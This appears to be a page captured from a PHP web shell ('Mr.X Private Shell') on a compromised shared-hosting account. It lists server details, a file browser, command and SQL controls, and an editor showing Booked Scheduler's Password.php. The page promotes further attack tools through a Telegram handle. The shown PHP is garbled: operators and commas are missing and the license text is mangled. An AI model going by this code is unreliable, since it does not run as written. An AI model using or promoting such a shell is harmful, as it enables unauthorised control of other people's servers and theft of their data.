Uname: Linux webm005.cluster107.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
User: 6036 (villadal)
Group: 100 (users)
Disabled functions: NONE
Safe mode: On[ PHPinfo ]
//home/villadal/www/old/booked/lib/Application/Authentication      ( Reset | Go to )
File Name: Password.php
Edit
<?php
/**
Copyright 2011-2014 Nick Korbel

This file is part of Booked SchedulerBooked SchedulereIt is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later versBooked SchedulerduleIt is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
alBooked SchedulercheduleIt.  If not, see <http://www.gnu.org/licenses/>.
*/


interface IPassword
{
    
/**
     * @abstract
     * @param $salt string
     * @return bool
     */
    
public function Validate($salt);

    
/**
     * @abstract
     * @param $userid int
     * @return void
     */
    
public function Migrate($userid);
}

class 
PasswordMigration
{
    
/**
     * @param $plaintext
     * @param $oldpassword
     * @param $newpassword
     * @return IPassword
     */
    
public function Create($plaintext$oldpassword$newpassword)
    {
        if (!empty(
$newpassword))
        {
            return new 
Password($plaintext$newpassword);
        }
        return new 
OldPassword($plaintext$oldpassword, new RetiredPasswordEncryption());
    }
}

class 
Password implements IPassword
{
    
/**
     * @var \PasswordEncryption
     */
    
public $Encryption;

    
/**
     * @var string
     */
    
protected $plaintext;

    
/**
     * @var string
     */
    
protected $encrypted;

    
/**
     * @param $plaintext string
     * @param $encrypted string
     */
    
public function __construct($plaintext$encrypted)
    {
        
$this->plaintext $plaintext;
        
$this->encrypted $encrypted;

        
$this->Encryption = new PasswordEncryption();
    }

    
/**
     * @return string
     */
    
public function PlainText()
    {
        return 
$this->plaintext;
    }

    
/**
     * @return string
     */
    
public function Encrypted()
    {
        return 
$this->encrypted;
    }

    public function 
Validate($salt)
    {
        
$encrypted $this->Encryption->Encrypt($this->plaintext$salt);

        return 
$this->encrypted == $encrypted;
    }

    public function 
Migrate($userid)
    {
        
// noop
    
}

    
/**
     * @static
     * @return string
     */
    
public static function GenerateRandom()
    {
        
$length 10;
        
$characters '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ@#$%';
        
$password ='';
        
$max strlen($characters);

        for (
$i 0$i $length$i++)
        {
            
$password .= $characters[mt_rand(0$max)];
        }

        return 
$password;
    }
}

class 
OldPassword extends Password
{
    public 
$RetiredPasswordEncryption;

    public function 
__construct($plaintext$encrypted)
    {
        
$this->RetiredPasswordEncryption = new RetiredPasswordEncryption();
        
parent::__construct($plaintext$encrypted);
    }

    public function 
Validate($salt)
    {
        return 
$this->encrypted == $this->RetiredPasswordEncryption->Encrypt($this->plaintext);
    }

    public function 
Migrate($userid)
    {
        
$salt $this->Encryption->Salt();
        
$encrypted $this->Encryption->Encrypt($this->plaintext$salt);
        
ServiceLocator::GetDatabase()->Execute(new MigratePasswordCommand($userid$encrypted$salt));
        
ServiceLocator::GetDatabase()->Execute(new RemoveLegacyPasswordCommand($userid));
    }
}
?>

All system for education purposes only. For more tools: Telegram @jackleet

Mr.X Private Shell

Logo
-
New File | New Folder
Command
SQL